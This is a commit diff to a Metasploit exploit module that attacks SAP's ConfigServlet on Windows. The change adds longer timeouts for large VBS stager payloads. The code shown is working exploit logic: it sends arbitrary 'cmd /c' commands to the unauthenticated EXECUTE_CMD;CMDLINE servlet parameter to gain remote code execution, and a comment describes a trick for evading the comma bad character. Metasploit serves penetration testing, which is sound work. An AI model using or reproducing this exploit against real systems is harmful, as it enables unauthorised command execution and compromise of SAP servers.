implement dynamic timeout handling

modules/exploits/windows/http/sap_configservlet_exec_noauth.rb

@@ -60,6 +60,7 @@ class Metasploit3 < Msf::Exploit
 	def execute_command(cmd, opts)
 		commands = cmd.split(/&/)
 		commands.each do |command|
+			timeout = 20
 			if command.include?(".vbs") and command.include?(",")
 				# becasue the comma is bad character and the VBS stager contains commas it is necessary to "create" commas withouth directly using them
 				# using the following command line trick it is possible to echo commas into the right places
@@ -68,19 +69,24 @@ class Metasploit3 < Msf::Exploit
 			else
 				command = "cmd /c " + command
 			end
+			if command.include?("cscript")
+				# in case of bigger payloads the VBS stager could run for longer time as it needs to decode lot of data
+				# increaste timeout value when the VBS stager is called
+				timeout = 120
+			end
 			vprint_status("Attempting to execute: #{command}")
-			send_evil_request(opts[:sap_configservlet_uri], command)
+			send_evil_request(opts[:sap_configservlet_uri], command, timeout)
 		end
 	end
 
-	def send_evil_request(uri, cmd)
+	def send_evil_request(uri, cmd, timeout)
 		begin
 			res = send_request_cgi(
 				{
 					'uri' => uri,
 					'method' => 'GET',
 					'query' => 'param=com.sap.ctc.util.FileSystemConfig;EXECUTE_CMD;CMDLINE=' + Rex::Text.uri_encode(cmd)
-				})
+				}, timeout)
 
 			if !res
 				print_error("#{rhost}:#{rport} - Exploit failed.")